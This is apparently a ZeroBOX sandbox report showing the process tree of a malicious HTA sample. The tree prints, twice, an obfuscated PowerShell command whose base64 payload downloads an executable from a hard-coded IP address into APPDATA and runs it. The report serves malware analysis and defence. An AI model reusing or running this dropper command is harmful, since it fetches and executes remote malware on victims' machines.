| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\niceworkingskillwithbestideasevermade.hta.html
1636
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1636 CREDAT:145409
  1188
  - cmd.exe "C:\Windows\system32\cmd.exe" "/c poWERShELl -eX BYpASs -nop -w 1 -C devICecreDeNTIaLDePlOYment.eXe ; IeX($(Iex('[sYstem.TEXT.ENCodIng]'+[CHaR]0x3A+[Char]0X3a+'UtF8.geTStrING([SYsTEm.ConvERt]'+[CHAR]58+[ChAR]58+'FRombase64String('+[chAr]34+'JE0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQkVyZEVGaU5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnaVl1R0pHWm96YixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBndWxub0xiQnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJmRUpjemxLdHhKLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpWVHp1VnJYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT0JxY1p2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1Fc1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVSVJSQVkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE06OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMTIuODkuMjQvMTIzL2Nhc3NlLmV4ZSIsIiRFTnY6QVBQREFUQVxjYXNzZS5leGUiLDAsMCk7c1RhUnQtc2xFZXAoMyk7SW5Wb2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGNhc3NlLmV4ZSI='+[CHAr]34+'))')))"
    564
    - powershell.exe poWERShELl -eX BYpASs -nop -w 1 -C devICecreDeNTIaLDePlOYment.eXe ; IeX($(Iex('[sYstem.TEXT.ENCodIng]'+[CHaR]0x3A+[Char]0X3a+'UtF8.geTStrING([SYsTEm.ConvERt]'+[CHAR]58+[ChAR]58+'FRombase64String('+[chAr]34+'JE0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQkVyZEVGaU5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnaVl1R0pHWm96YixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBndWxub0xiQnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJmRUpjemxLdHhKLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpWVHp1VnJYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT0JxY1p2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1Fc1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVSVJSQVkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE06OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMTIuODkuMjQvMTIzL2Nhc3NlLmV4ZSIsIiRFTnY6QVBQREFUQVxjYXNzZS5leGUiLDAsMCk7c1RhUnQtc2xFZXAoMyk7SW5Wb2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGNhc3NlLmV4ZSI='+[CHAr]34+'))')))"
      1560
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hwico4i0.cmdline"
        2508
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES3ACE.tmp" "c:\Users\test22\AppData\Local\Temp\CSC3A5F.tmp"
        2084

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents